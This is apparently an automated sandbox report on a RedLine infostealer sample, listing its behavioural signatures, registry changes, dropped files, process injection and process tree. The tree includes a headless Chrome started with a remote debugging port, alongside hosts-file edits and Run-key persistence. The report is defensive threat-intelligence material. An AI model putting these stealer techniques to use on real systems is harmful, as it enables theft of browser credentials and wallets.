Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-nzsd2sde4w
Target 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712
SHA256 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712

Threat Level: Known bad

The file 3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712 was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Executes dropped EXE

Themida packer

Reads user/profile data of web browsers

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 11:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 11:50

Reported

2023-08-12 11:53

Platform

win10-20230703-en

Max time kernel

150s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target Count
N/A N/A N/A N/A 16

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5104 set thread context of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 836 set thread context of 4436 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 836 set thread context of 1520 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Count
N/A N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A 3
N/A N/A C:\Windows\Temp\setup.exe N/A 2
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 3
N/A N/A C:\Windows\Temp\setup.exe N/A 6
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 4
N/A N/A C:\Windows\Temp\setup.exe N/A 2
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 3
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A 2
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 1
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 1
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 2
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 6
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A 6
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 3
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A 4
N/A N/A C:\Windows\explorer.exe N/A 16

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Count
PID 4340 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\mi.exe 3
PID 4340 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cli.exe 3
PID 5104 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe 5
PID 2680 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe 2
PID 4340 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe C:\Users\Admin\AppData\Local\Temp\cc.exe 3
PID 2400 wrote to memory of 3276 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe 2
PID 3276 wrote to memory of 4736 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe 2
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe 35
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 1360 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 3572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 3572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3276 wrote to memory of 196 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe

"C:\Users\Admin\AppData\Local\Temp\3cb7602998efd8e8243e1d3890c1d65adb3c335aab4a9c4a2f43c33df5349712.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=37844 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataU8A8E" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffdc1f39758,0x7ffdc1f39768,0x7ffdc1f39778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1240 --field-trial-handle=1296,i,11899475951544078836,4426467480687843026,131072 --disable-features=PaintHolding /prefetch:2

